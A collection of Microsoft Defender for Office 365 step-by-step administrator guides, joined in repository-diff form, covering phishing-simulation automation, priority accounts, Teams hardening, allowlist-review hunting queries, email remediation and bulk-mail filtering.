-description: The steps to automate Attack Simulation training and send a payload to target users. By following this guide, you learn to create automated attack flows with specific techniques and payloads.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# How to setup automated attacks and training within Attack simulation training
-
-Attack simulation training lets you run benign attack simulations on your organization to assess your phishing risk and teach your users how to better avoid phishing attacks. By following this guide, you can configure automated flows with specific techniques and payloads that run when the specified conditions are met, launching simulations against your organization.
-
-## What you need
--- Microsoft Defender for Office 365 Plan 2 (included as part of E5).-- Sufficient permissions (Security Administrator role).-- 5-10 minutes to perform the following procedures.-
-## Send a payload to target users
-
-1. Navigate to [Attack simulation training](https://security.microsoft.com/attacksimulator).
-1. Choose **Simulation automations** from the top navigation bar.
-1. Press **Create automation**.
-1. Name the Simulation automation with something relevant and memorable. *Next*.
-1. Pick the techniques you'd like to use from the flyout. *Next*.
-1. Manually select up to 20 payloads you'd like to use for this automation, or alternatively select Randomize. *Next*.
-1. If you picked OAuth as a Payload, you need to enter the name, logo, and scope (permissions) you'd like the app to have when it's used in a simulation. *Next*.
-1. Choose who to target with the payload, if choosing the entire organization highlight the radio button. *Next*.
-1. Otherwise, select **Add Users** and then search or filter the users with the wizard, press Add Users. *Next*.
-1. Customize the training if appropriate, otherwise leave Assign training for me (recommended) selected. *Next*.
-1. Customize the landing page displayed when a user is phished if appropriate, otherwise leave as the Microsoft Default. *Next*.
-1. Choose if you'd like end user notifications, if so select the delivery preferences and customize where appropriate. *Next*.
-1. For Simulation schedule, you can either select **Randomized** or **Fixed**, the recommended option is Randomized, once selected, select *Next*.
-1. Depending on your choice of Randomized or Fixed, the schedule details can differ, but select preferences on the choice, including the start and end dates of the automation. *Next*.
-1. For **Launch Details**, select any final options you want, such as using unique payloads, or targeting repeat offenders and then select *Next*.
-1. **Submit** and the Simulation automation is set up.
-
-## Learn More
-
-Full guidance can be found at [Simulation automations for Attack simulation training - Office 365 | Microsoft Docs](../../office-365-security/attack-simulation-training-simulation-automations.md).
security Optimize And Correct Security Policies With Configuration Analyzer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/optimize-and-correct-security-policies-with-configuration-analyzer.md
- Title: Optimize and correct security policies with configuration analyzer
-description: The steps to optimize and correct security policies with configuration analyzer. Configuration analyzer is a central location and single pane of glass for administering and viewing the email security policies you have configured in your tenant.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# Optimize and correct security policies with configuration analyzer
-
-Configuration analyzer is a central location and single pane of glass for administering and viewing the email security policies you have configured in your tenant. You can perform a side-to-side comparison of your settings to our Standard and Strict recommended settings, apply recommendations and view historical changes that affected your posture.
-
-## What you'll need
--- Exchange Online Protection-- Sufficient permissions (Security Administrator role)-- 5 minutes to perform the steps below.-
-## Compare settings and apply recommendations
-
-1. Navigate to [https://security.microsoft.com/configurationAnalyzer](https://security.microsoft.com/configurationAnalyzer).
-1. Pick either **Standard recommendations** or **Strict recommendations** from the top menu based on the side-to-side comparison you'd like to make.
-1. Recommendations for policy changes will be displayed. (If applicable)
-1. You can then select a recommendation, note the recommended action, policy which the recommendation is applicable to, setting name & current configuration etc.
-1. With a recommendation selected, you can press **Apply recommendation** and then **OK** on the confirmation message that appears.
-1. If you wish to manually edit a policy, or confirm settings directly within the policy, you can press **View policy** instead of **Apply recommendation** which will load a new tab and take you directly to the affected policy for ease.
-
-## View historical configuration changes
-
-While in **Configuration analyzer** you can select **Configuration drift analysis and history** from the top menu bar.
-
-The page which loads will show you the modifications to your security policies in the timeframe selected by the filters, along with data about the change and if it increased or decreased your overall posture.
-
-To learn more details about Configuration Analyzer, see [Configuration analyzer for security policies - Office 365 | Microsoft Docs](../../office-365-security/configuration-analyzer-for-security-policies.md).
security Protect Your C Suite With Priority Account Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/protect-your-c-suite-with-priority-account-protection.md
- Title: Protect your c-suite with Priority account protection in Microsoft Defender for Office 365 Plan 2
-description: The steps to protect your c-suite with priority account protection. Tagging an account as a Priority account enables the extra protection tuned for the mail flow patterns targeting company executives, along with extra visibility in reports, alerts, and investigations.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# Protect your c-suite with priority account protection
-
-Priority account protection helps IT and security teams ensure a high quality of service and protection for the critical people within your organization. Tagging an account as a priority account enables the extra protection tuned for the mail flow patterns targeting company executives, along with extra visibility in reports, alerts, and investigations.
-
-## What you need
--- Microsoft Defender for Office 365 Plan 2 (included as part of E5 plans)-- Sufficient permissions (Security Administrator role)-- 5 minutes to perform the following procedures.-
-## Tag Priority users
-
-1. Identify the users, groups, or domains you would like to tag as priority accounts.
-1. Sign in to the [Microsoft Defender portal](https://security.microsoft.com/) and navigate to Settings on the left navigation bar.
-1. Select **Email & collaboration** on the page that loads and then select **User tags**.
-1. On the **User tags** page, select the **Priority account** tag, and then select **Edit**.
-1. On the flyout that appears, select **Add members**.
-1. Search for the users you wish to tag, select one or more users, and then select **Add**.
-1. Review the members you selected, and then select **Next**.
-1. Select **Submit** to confirm the changes.
-
-## Confirm priority account protection is enabled for tagged users
-
-1. Sign to the [Microsoft Defender portal](https://security.microsoft.com/).
-1. In the navigation bar, select **Settings**.
-1. Select **Priority account protection**.
-1. Make sure protection is set to **On**.
-
-To learn what priority account tags are see [Manage and monitor priority accounts - Microsoft 365 admin | Microsoft Docs](../../../admin/setup/priority-accounts.md).
-
-## Next Steps
-
-[Review differentiated protection from priority account protection].
-
-[Review the differentiated protection for users tagged as Priority accounts](../priority-accounts-turn-on-priority-account-protection.md#review-differentiated-protection-from-priority-account-protection).
-
-## PowerShell configuration
-
-If you want to achieve these steps via [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), you can do this using the following commands:
--- View a list of priority accounts: `Get-User -IsVIP | select Identity`-- Add user to list of priority accounts: `Set-User -VIP $true -Identity <Identity>`-- Remove user from list of priority accounts: `Set-User -VIP $false -Identity <Identity>`
security Reducing Attack Surface In Microsoft Teams https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/reducing-attack-surface-in-microsoft-teams.md
- Title: Reduce the attack surface for Microsoft Teams
-description: Configuration which can be used to reduce the attack surface in Microsoft Teams, including enabling Microsoft Defender for Office 365.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/05/2023--
-# Reduce the attack surface for Microsoft Teams
-
-Microsoft Teams is a widely used collaboration tool, where many users are now spending their time. Attackers know this and are pivoting. Below are a set of steps you can perform to reduce the attack surface in Teams and help keep your organization more secure.
-
-> [!IMPORTANT]
-> There is a balance to strike between security and productivity, and not all these steps may be relevant for your organizational risk profile.
-
-## What you'll need
--- Microsoft Teams-- Microsoft Defender for Office 365 Plan 1 (for some features)-- Sufficient permissions (Teams administrator / security administrator)-- 5-10 minutes to perform the steps below.-
-> [!NOTE]
-> Not all these options will be available for government specific clouds such as Microsoft 365 GCC.
-
-## Turn on Microsoft Defender for Office 365 in Teams
-
-If licensed for Microsoft Defender for Office 365 (free 90-day evaluation available at aka.ms/trymdo) you can ensure seamless protection from zero-day malware and time of click protection within Microsoft Teams.
-
-[Learn More (SafeLinks)](../safe-links-about.md#safe-links-settings-for-microsoft-teams) & [Learn More (Safe Attachments)](../safe-attachments-for-spo-odfb-teams-configure.md) (Detailed Documentation)
-
-1. **Login** to the security center's safe attachments configuration page at <https://security.microsoft.com/safeattachmentv2>.
-2. Press **Global settings**.
-3. Ensure **Turn on Defender for Office 365 for SharePoint, OneDrive, and Microsoft Teams** is set to on.
-4. Navigate to the security center's Safe links configuration page at: <https://security.microsoft.com/safelinksv2>.
-5. If you have multiple policies, you'll need to complete this step for each policy (excluding built-in, standard and strict preset policies).
-6. **Select** a policy, a flyout appears on the left-hand side.
-7. Press **Edit protection settings**.
-8. Ensure **Safe Links checks a list of known, malicious links when users click links in Microsoft Teams** is checked.
-9. Press **Save**.
-10. In organizations with Microsoft Defender for Office 365 Plan 2 or Microsoft Defender XDR, admins can decide whether users can report malicious messages in Microsoft Teams. Learn more here. [User reported message settings in Microsoft Teams](../submissions-teams.md)
-
-## Restricting channel email messages to approved domains
-
-An attacker could email channels directly if they discover the channel email address. The best practice is to have this only setup for known trusted domains rather than open to all (default).
-
-1. **Login** to the Teams admin center at: <https://admin.teams.microsoft.com/>.
-2. On the left-hand navigation, expand **Teams** and then choose **Teams settings**.
-3. Under the **Email integration** heading, choose to allow or disallow users to send emails to a channel email address by toggling **Users can send emails to a channel email address**.
-4. If you have allowed users to send emails to a channel email address in the previous step, enter the specific domains you wish to accept mail from in the **Accept channel email from these SMTP domains** box. (for example, an alert provider, or trusted supplier).
-5. Press **Save** at the bottom of the page.
-
-## Managing third party storage options
-
-Users can store their files in potentially unsupported third party storage providers. If you don't use these providers, you can disable this setting to reduce data leakage risk.
-
-1. **Login** to the Teams admin center at: <https://admin.teams.microsoft.com/>.
-2. On the left-hand navigation, expand **Teams** and then choose **Teams settings**.
-3. Under the **Files** heading, choose which storage providers you want to be available for use within the files tab.
-4. Press **Save** at the bottom of the page.
-
-## Disabling Third-party & custom apps
-
-Applications are a very useful part of Microsoft Teams, but it's recommended to maintain a list of allowed apps rather than allowing all apps by default.
-
-1. **Login** to the Teams admin center at: <https://admin.teams.microsoft.com/>.
-2. On the left-hand navigation, expand **Teams apps** and then choose **Permission Policies**.
-3. If you have custom permission policies, you'll need to do these steps for each of them if appropriate, otherwise select **Global (Org-wide default)**.
-4. Select the appropriate settings for your organization, a recommended starting point is:
- - Microsoft apps ΓÇô set to **Allow all apps** (default).
- - Third-party apps ΓÇô set to **Allow specific apps and block all others** (if you already have third party apps to then select for allowing) otherwise select **Block all apps**.
- - Custom apps ΓÇô set to **Allow specific apps and block all others** (if you already have custom apps to then select for allowing) otherwise select **Block all apps**.
-5. Press **Save**.
-6. You need to change this setting for each policy (if you've multiple).
-
-## Configure meeting settings
-
-You can reduce the attack surface by ensuring people outside your organization can't request access to control presenter's screens and require dial in and all external people to be authenticated & admitted from a meeting lobby.
-[Learn more](/microsoftteams/meeting-policies-participants-and-guests) (detailed documentation).
-
-1. **Login** to the Teams admin center at: <https://admin.teams.microsoft.com/>.
-2. On the left-hand navigation, expand **Meetings** and then choose **Meeting Policies**.
-3. If you've assigned any custom or built-in policies to users, you'll need to do these steps for each of them if appropriate, otherwise select **Global (Org-wide default)**.
-4. Under the **Content sharing** heading, ensure **External participants can give or request control** is set to **off**.
-6. Under the **Meeting join & lobby** heading, ensure **People dialing in can bypass the lobby** is set to **off**.
-7. Ensure **Anonymous users can join a meeting** is set to **off**.
-8. Under the **Meeting engagement** heading, Set **Meeting chat** to **"On for everyone but anonymous users"**.
-9. Select **Save**.
-10. You need to change this setting for each policy.
-
-## Configure meeting settings (Restrict presenters)
-
-You can reduce the risk of unwanted or inappropriate content being shared during meetings by restricting who can present to Organizers (everyone is allowed to present by default).
-
-1. **Login** to the Teams admin center at: <https://admin.teams.microsoft.com/>.
-2. On the left-hand navigation, expand **Meetings** and then choose **Meeting Policies**.
-3. If you've assigned any custom or built-in policies to users, you'll need to do these steps for each of them if appropriate, otherwise select **Global (Org-wide default)**.
-4. Under the **Content sharing** heading, set **Who can present** to **Only organizers and co-organizers**.
-5. Select **Save**.
-6. You need to change this setting for each policy.
-
-## Limit domains for external access
-
-External access allows your users to communicate externally in Teams, allowing external organizations to start a conversation with your users and vice versa, which is useful for collaboration, but also for attackers to directly communicate with your organization if they know a victim's email address.
-[Learn more](/microsoftteams/manage-external-access) (detailed documentation)
-
-1. **Login** to the Teams admin center at: <https://admin.teams.microsoft.com/>.
-2. On the left-hand navigation, expand **Users** and then choose **External access**.
-3. Under the **Teams and Skype for Business users in external organizations** heading, select the **Choose which external domains your users have access to** dropdown and set this to **Allow only specific external domains**.
-4. Enter any external domains users should be able to communicate with by selecting **Allow domains**, using the flyout, and selecting **Done** when finished.
-5. Select **Save**.
-
-Note that external organizations must also allow your organization's domain for external access to work.
-
-## Learn More
-
-Consider configuring access policies to implement Zero Trust identity and device access policies to protect Microsoft Teams chats, groups, and content such as files and calendars.
-
-Learn more about teams access policies: [Policy recommendations for securing Teams chats, groups, and files](../zero-trust-identity-device-access-policies-teams.md).
-
-Security in Microsoft Teams: [Overview of security and compliance - Microsoft Teams | Microsoft Docs](/microsoftteams/security-compliance-overview).
security Review Allow Entries https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/review-allow-entries.md
- Title: Review and remove unnecessary allowlist entries with Advanced Hunting in Microsoft Defender for Office 365
-description: Steps and sample queries for advanced hunting to start reviewing your security configuration and removing unnecessary allowlist entries.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/04/2023--
-# Introduction
-
-Historically, allowlists enabled Exchange Online Protection to ignore the signals indicating an email is malicious. It's commonplace for vendors to request IPs, domains, and sender addresses be overridden unnecessarily. Attackers are known to take advantage of this mistake and it's a pressing security loophole to have unnecessary allowlist entries. This step-by-step guide walks you through using advanced hunting to identify these misconfigured overrides and remove them, so you can increase your organization's security posture.
-
-## What you need
--- Microsoft Defender for Office 365 Plan 2 (Included in E5 plans, or trial available at aka.ms/trymdo)-- Sufficient permissions (Security reader role)-- 5-10 minutes to do the following procedures.-
-## Common steps for all the below queries
-
-1. [Sign in to the security portal and navigate to advanced hunting](https://security.microsoft.com/advanced-hunting)
-2. Enter the KQL query into the query box, and press **Run Query**.
-3. Pressing the **NetworkMessageId** hyperlink for individual emails when shown in the results loads a flyout, allowing easy access to the email entity page, where the **analysis** tab provides further details, such as the transport rules that email matched.
-4. The results can also be exported by pressing **Export** for manipulation / analysis offline.
-
-> [!TIP]
-> Changing **OrgLevelAction** to **UserLevelAction** will allow you to search for email warnings that were overridden by users rather than administrators, and can also be a useful insight.
-
-## Queries
-
-### Top override source
-
-Use this query to find where the most unnecessary overrides are located. This query looks for emails that were overridden without any detection that needed an override.
-
-```kusto
-EmailEvents
-| where OrgLevelAction == "Allow"
-| summarize count() by OrgLevelPolicy, ThreatTypes
-```
-
-### Top overridden threat type
-
-Use this query to find the most overridden types of threat detected. This query looks for emails that had the detected threat overridden, DMARC, or Spoof indicates email authentication issues that can be fixed to remove the *need* for the override.
-
-```kusto
-EmailEvents
-| where OrgLevelAction == "Allow" and ThreatTypes != ""
-|summarize count() by DetectionMethods
-```
-
-### Top overridden IPs
-
-This query looks for emails that were overridden by IP, without any detection that called for an override.
-
-```kusto
-EmailEvents
-| where OrgLevelAction == "Allow" and ThreatTypes != ""
-|summarize count() by SenderIPv4
-| top 10 by count_
-```
-
-### Top overridden domains
-
-This query looks for emails that were overridden by sending domain without any detection that called for an override. **(Change to SenderMailFromDomain to check the 5321.MailFrom)**
-
-```kusto
-EmailEvents
-| where OrgLevelAction == "Allow" and ThreatTypes != ""
-|summarize count() by SenderFromDomain
-| top 10 by count_
-```
-
-### Top overridden senders
-
-This query looks for emails that were overridden by sending address without any detection that requires an override. **(Change to SenderMailFromAddress to check the 5321.MailFrom)**
-
-```kusto
-EmailEvents
-| where OrgLevelAction == "Allow" and ThreatTypes != ""
-|summarize count() by SenderFromAddress
-| top 10 by count_
-```
-
-## Learn More
-
-Hopefully you found this article to be useful, with some basic queries to get you started with advanced hunting, to learn more check out the below articles:
-
-Learn more about advanced hunting: [Overview - Advanced hunting](../../defender/advanced-hunting-overview.md).
-
-Learn more about authentication: [Email Authentication in Exchange Online Protection](../email-authentication-about.md).
security Search For Emails And Remediate Threats https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/search-for-emails-and-remediate-threats.md
- Title: Search for emails and remediate threats using Threat Explorer in Microsoft Defender XDR
-description: The steps to do manual remediation in Threat Explorer in Microsoft Defender XDR, including how to get the best performance and scenarios that call for remediation.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# Steps to use manual email remediation in Threat Explorer
-
-Email remediation is an already existing feature that helps admins act on emails that are threats.
-
-## What you need
--- Microsoft Defender for Office 365 Plan 2 (Included in E5 plans)-- Sufficient permissions (be sure to grant the account [Search and Purge](https://sip.security.microsoft.com/securitypermissions) role)-
-## Create and track the remediation
-
-1. **Select a threat to remediate** in [Threat Explorer](https://security.microsoft.com/threatexplorer) and select the **Message Actions** button, which offers you options such as *Soft Delete* or *Hard Delete*.
-1. The side pane opens and asks for details, like a name for the remediation, severity, and description. Once the information is reviewed, select **Submit**.
-1. As soon as the admin approves this action, they see the Approval ID and a link to the Microsoft Defender XDR Action Center [here](https://security.microsoft.com/action-center/history). This page is where **actions can be tracked**.
- 1. **Admin action alert** - A system alert shows up in the alert queue with the name 'Administrative action submitted by an Administrator'. This indicates that an admin took the action of remediating an entity. It gives details such as the name of the admin who took the action, and the investigation link and time. This makes admins aware of each important action, like remediation, taken on entities.
- 1. **Admin action investigation** - Since the analysis on entities was already done by the admin and that's what led to the action taken, no more analysis is done by the system. It shows details such as related alert, entity selected for remediation, action taken, remediation status, entity count, and approver of the action. This allows admins to keep track of the investigation and actions carried out *manually*--an admin action investigation.
-1. **Action logs in unified action center** - History and action logs for email actions like soft delete and move to deleted items folder, are *all available in a centralized view* under the unified **Action Center** > **History tab**.
-1. **Filters in unified action center** - There are multiple filters such as remediation name, approval ID, Investigation ID, status, action source, and action type. These are useful for finding and tracking email actions in unified Action center.
-
-> [!IMPORTANT]
-> For better performance, remediation should be done in batches of *50,000 or fewer*. Narrow down the search result by using *latest delivery location* and trigger email remediation if the email is in remediable folder like Inbox, Junk, Deleted, for example.
-
-## Scenarios that call for email remediation
-
-Here are scenarios of email remediation:
-
-1. As part of an investigation SecOps identifies a threat in an end-user's mailbox and wants to clear out the problem emails.
-1. When suggested email actions in Automated Investigation and Response (AIR) are approved by SecOps, remediation action triggers automatically for the given email or email cluster.
-
-Two manual email remediation scenarios:
-
-1. The main scenario:
- 1. Manual actions taken on emails (for example, using Threat Explorer or Advanced Hunting) are only visible in the legacy Defender for Office 365 Action Center (Email and Collaboration > Review > Action Center in Action center - Microsoft 365 security).
-1. Two-step approval scenario:
- 1. Manual actions pending approval using the two-step approval process (1. The email was added to remediation by one analyst, 2. The email was reviewed and approved by another analyst).
-
-Given the common scenarios, email remediation can be triggered in three different ways.
-
-1. **Query based remediation**: By selecting all the search results with a query (200,000 emails can be submitted at a maximum).
-1. **Handpicked remediation**: Selecting emails one-by-one by clicking on the check box (100 emails can be submitted at one time).
-1. **Query based remediation with exclusions**: Selecting all emails, and then manually removing a few messages (the query can hold a maximum of 1,000 emails and the maximum number of exclusions is 100).
-
-## Next Steps
-
-1. Go to the [Microsoft Defender portal](https://security.microsoft.com) and sign in.
-1. In the navigation pane, select **Action center**.
-1. Go to the **History** tab, select any waiting approval list. It opens up a side pane.
-1. Track the action status in the unified action center.
-
-## More information
-
-[Learn more about email remediation](../../office-365-security/air-review-approve-pending-completed-actions.md).
security Stay Informed With Message Center https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/stay-informed-with-message-center.md
- Title: Steps to set up a weekly digest email of message center changes for Microsoft Defender for Office 365
-description: The steps to set up a weekly digest email of message center activity to stay up-to-date about changes to Microsoft Defender for Office 365.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# Set up a digest notification of changes to Microsoft Defender for Office 365 using the message center
-
-Would it be convenient if, every week, a digest email of Microsoft Defender for Office 365 changes from the Microsoft message center landed in your inbox?
-
-The message center is where admins learn about official *service announcements and feature changes*, via visiting the site (desktop or mobile app), consulting Microsoft Planner, or *by email*.
-
-## Before you begin
-
-What you'll need before you get started.
--- Microsoft Defender for Office 365 Plan 1 or 2-- Sufficient permissions (Message center reader as a minimum)-
-## Steps to set up a weekly digest mail of message center changes and notifications
-
-1. Log in to the **Admin Center** at <https://admin.microsoft.com>.
-1. On the left-hand navigation, select **Show All**.
-1. Expand **Health** and press **Message Center**.
-1. On the page that loads, select **Preferences**.
-1. A flyout appears on the right, select the **Email** tab.
-1. Make sure the email notification settings are as expected. You can select **Other e-mail addresses** if you want the digest to be sent to different users or a shared mailbox.
-1. Select the **Send me a weekly digest about services I select** box, and select the services you wish to receive information about, as a minimum you should select **Exchange Online** & **Microsoft Defender XDR**.
-1. Press **Save**.
-
-You're done.
-
-## Learn More
-
-[Track new and changed features in the Microsoft 365 Message center](../../../admin/manage/message-center.md)
-
-[Track your message center tasks in Planner](/office365/planner/track-message-center-tasks-planner)
security Step By Step Guide Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/step-by-step-guide-overview.md
- Title: Microsoft Defender for Office 365 step-by-step guides and how to use them
-description: What are the step-by-step-guides for Microsoft Defender XDR for Office 365? See *only the steps needed to complete a task* and set up features. Information for use in trial subscriptions and production. Guidance designed to minimize information overload and speed up your configuration and use.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 04/04/2024--
-# Welcome to the Microsoft Defender for Office 365 step-by-step guides
-
-Microsoft Defender for Office 365 is a powerful product with many capabilities. Along with that comes much documentation and detail. **But sometimes you have to get a task completed *quickly*. That's when you need a step-by-step guide.**
-
-These step-by-step guides help administrators configure and use Microsoft Defender for Office 365 by reducing distracting information like how a feature might work, and other details not *directly linked to completing a process*. The guides focus on specific steps to perform a task, and reduce the time taken for admins to test a feature and secure an organization.
-
-***If you learn Microsoft products best by doing***, the step-by-step guides will jumpstart configuration and testing. They're as useful for setup in a *trial subscription* as they are in *production*.
-
-> [!NOTE]
-> Try the [Defender for Office 365 setup guide](https://admin.microsoft.com/Adminportal/Home?Q=ADG#/modernonboarding/office365advancedthreatprotectionadvisor) for step-by-step instructions that are tenant-aware and customized to your organization's needs. This setup guide helps you implement anti-malware policies, anti-phishing policies, safe attachments, and more.
-
-## Why use Microsoft Defender for Office 365 step-by-step guides
-
-> [!IMPORTANT]
-> Admins need to be on top of prevention, detection, investigation and hunting, response and remediation, and user training to position their organization securely. The step-by-step guides touch on all of these areas so that admins can set up trials, launch quickly into production, and configure in minutes.
->:::image type="content" source="../../../media/msft-a-graphic-showing-the-steps-to-mastering-microsoft-defender-for-office-365.png" alt-text="This graphic illustrates the areas that admins need to master in order to properly secure their organization. The step-by-step guides touch on all of these areas, so that admins can set up trials, launch quickly, and configure production in minutes.":::
-
-Beyond links to the documentation, the step-by-step guides don't concern themselves with product details (the docs around Microsoft Defender for Office 365 are thorough for when you need them).
-
-Instead, these guides are streamlined for **learning by doing**, **testing**, and **running experiments**. They're ideal for **trial subscriptions**, and allow admins and security operators to **deploy the same logic in production**.
-
-## Examples
--- If you recently got Microsoft Defender for Office 365, and you want to get protected as quickly as possible use [Preset security policies](ensuring-you-always-have-the-optimal-security-controls-with-preset-security-policies.md).--- Take advantage of other protections designed for [members of your c-suite](protect-your-c-suite-with-priority-account-protection.md).--- How do you [setup](how-to-run-attack-simulations-for-your-team.md) or [automate](how-to-setup-attack-simulation-training-for-automated-attacks-and-training.md) a new simulation quickly and easily?--- [Connect Microsoft Defender for Office 365 to Sentinel](connect-microsoft-defender-for-office-365-to-microsoft-sentinel.md).-
-Documentation in this format can be found under the step-by-step section in Office 365 Security. Visit the docs by using [aka.ms/step-by-step](https://aka.ms/step-by-step).
-
-**If there's a topic, task or config you'd like to see in this format, please let us know by leaving feedback. Thank you!**
security Track And Respond To Emerging Threats With Campaigns https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/track-and-respond-to-emerging-threats-with-campaigns.md
- Title: Track and respond to emerging security threats with campaigns view in Microsoft Defender for Office 365
-description: Walkthrough of threat campaigns within Microsoft Defender for Office 365 to demonstrate how they can be used to investigate a coordinated email attack against your organization.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# Track and respond to emerging threats with campaigns in Microsoft Defender for Office 365
-
-Campaigns can be used to track and respond to emerging threats because campaigns allow you to investigate a coordinated email attack against your organization. As new threats target your organization, Microsoft Defender for Office 365 will automatically detect and correlate malicious messages.
-
-## What you will need
--- Microsoft Defender for Office 365 Plan 2 (included in E5 plans).-- Sufficient permissions (Security Reader role).-- Five to ten minutes to perform these steps.-
-## What is a campaign in Microsoft Defender for Office 365
-
-A campaign is a coordinated email attack against one or many organizations. Email attacks that steal credentials and company data are a large and lucrative industry. As technologies to stop attacks grow and multiply, attackers modify their methods to continue their success.
-
-Microsoft leverages vast amounts of anti-phishing, anti-spam, and anti-malware data across the entire service to help identify campaigns. We analyze and classify the attack information according to several factors, for example:
--- **Attack source**: The source IP addresses and sender email domains.-- **Message properties**: The content, style, and tone of the messages.-- **Message recipients**: How recipients are related, for example, recipient domains, recipient job functions (such as admins and executives), company types (such as large, small, public, and private), and industries.-- **Attack payload**: Malicious links, attachments, or other payloads in the messages.-
-A campaign might be short-lived, or could span several days, weeks, or months with active and inactive periods. A campaign might be launched against your specific organization, or your organization might be part of a larger campaign across *multiple* companies.
-
-> [!TIP]
-> To learn more about the data available within a campaign, read [Campaign Views in Microsoft Defender for Office 365](../campaigns.md).
-
-## Watch the *Exploring campaign views* video
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWGBL8]
-
-## Investigating a suspicious email campaign using threat reports
-
-In the event that a campaign has targeted your organization and you'd like to learn more about the impact:
-
-1. Navigate to the [campaign page](https://security.microsoft.com/campaigns).
-1. Select the campaign name that you would like to investigate.
-1. Upon the flyout opening, select **Download threat report**.
-1. Open the threat report and it will provide more information surrounding the campaign. The information in the report includes:
- - **Executive summary:** High-level summary of the type of campaign and the number of users targeted in your organization.
- - **Analysis:** Timeline chart of when the campaign started, the count of messages targeting your organization, and the destination and verdicts of the messages.
--- **Attack origin:** Top sending IP addresses and domains with a count of messages that were delivered to inboxes in your organization. This allows you to investigate who is targeting your organization.-- **Email template and payload:** The subject line of the emails that were part of the campaign and URLs (and their frequency) present as part of the campaign.-- **Recommendations:** Recommendations for next steps to remediate messages.-
-## Investigate inboxed messages that are part of an email threat campaign
-
-1. Navigate to the [campaign page](https://security.microsoft.com/campaigns).
-1. Scroll through the list of campaigns in the **Details view**, below the graph.
-1. Select the campaign name you want to investigate. If the campaign has a click count of more than zero, that indicates that a user in your organization clicked on a URL or downloaded a file from the email.
-1. The campaign flyout displays more information about the campaign, the graph displays a timeline of the campaign from campaign start to end date, and the horizontal flow diagram displays the stages of the campaign from its origin, the verdict, and the current location of the messages.
-1. Below the flow diagram, select the **URL clicks** tab to display information regarding the click. Here you can see the user that clicked on a URL, if the user is tagged as a priority account user, the URL itself, and the time of click.
-1. If you want to learn more about the inboxed and clicked messages, select **Explore messages** \> **Inboxed messages**. A new tab will open and navigate to Threat Explorer.
-1. In the **details view** of Explorer you can reference **Latest delivery** to determine if a message is still in the inbox or was moved into quarantine by system ZAP. *To get more details about the specific message, select the message. The flyout provides extra information. Upon selecting the **Open email entity page** on the top left of the flyout, a new tab will open and give you further information about the message.*
-1. If you would like to take an action and move the messages out of the inbox, you can select the message and then select **Message actions** \> **Move to junk folder**. This will ensure your user doesn't continue to interact with the malicious message that could result in a potential breach.
-
-## Next steps
-
-To learn more, read, [Campaign Views in Microsoft Defender for Office 365](../campaigns.md).
security Tune Bulk Mail Filtering Walkthrough https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/tune-bulk-mail-filtering-walkthrough.md
- Title: Assess and tune your filtering for bulk mail in Defender for Office 365
-description: Tune bulk filtering settings within Exchange Online and Microsoft Defender for Office 365
-
- - NOCSH
------ m365-guidance-templates-- m365-security-- tier3- Previously updated : 02/22/2023--
-# Tune Bulk mail (grey mail) filtering in Defender for Office 365
-
-This guide describes how to tune your bulk email filtering settings in Exchange Online or Microsoft Defender for Office 365. This process includes configuring the delivery location of detected bulk mail and, if necessary, optional transport rules you can use to achieve a more aggressive filtering stance should this suit your organization's needs.
-
-## What you'll need
--- Exchange Online as a minimum. (Microsoft Defender for Office 365 offers extra functionality)-- Sufficient permissions. (Security Administrator)-- Basic understanding of checking message headers (for more information, see [View internet message headers in Outlook](https://support.microsoft.com/office/view-internet-message-headers-in-outlook-cd039382-dc6e-4264-ac74-c048563d212c))-- 30 minutes to complete the following steps-
-## Understanding the bulk (BCL) value
-
-Bulk mail is typically advertising emails or marketing messages. These emails can be more challenging to filter as some customers want these emails. Other customers consider these emails spam and don't want to receive them. We add a "BCL" value stamp on emails based on the number of complaints we get about that sender and allow you to select the threshold to accept so you can tune the number of bulk messages you receive.
-
-## Check the BCL value of an email and the threshold in your policies
-
-1. Take the headers of a message you're concerned with and search for the **"X-Microsoft-Antispam:"** header, which contains a **BCL value**. Make a note of this number.
-1. Repeat this process until you have an average BCL value. We'll use this value as the threshold. Any mail with a **BCL** value **above** this number will be impacted by the changes we make.
-1. **Login** to the Microsoft Security portal at <https://security.microsoft.com>.
-1. On the **left nav**, under **Email & collaboration**, select **Policies & rules**.
-1. Select **Threat policies** and then **Anti-Spam**.
-1. When the page loads, the next action you'll take depends on the type of policy you're using:
- 1. Preset Policies can't be edited. The threshold is 6 in standard, 5 in strict.
- 1. The default (inbuilt) policy is 7.
- 1. Custom policies are set to 7 by default unless another value is provided.
-1. **Edit** (or create a custom policy) to set the BCL threshold that meets your needs. For example, if most of the messages you collected (which were all unwanted) have a BCL value of 4 or higher, setting the BCL value to 4 in the policy would filter out these messages for your end users.
-1. Within that policy, under the **"Edit actions"** section, select the **"bulk message action"** and select what to do when the threshold is exceeded. For example, you could select Quarantine if you would like to keep all bulk out of the mailbox or use the Junk email folder for a less aggressive stance.
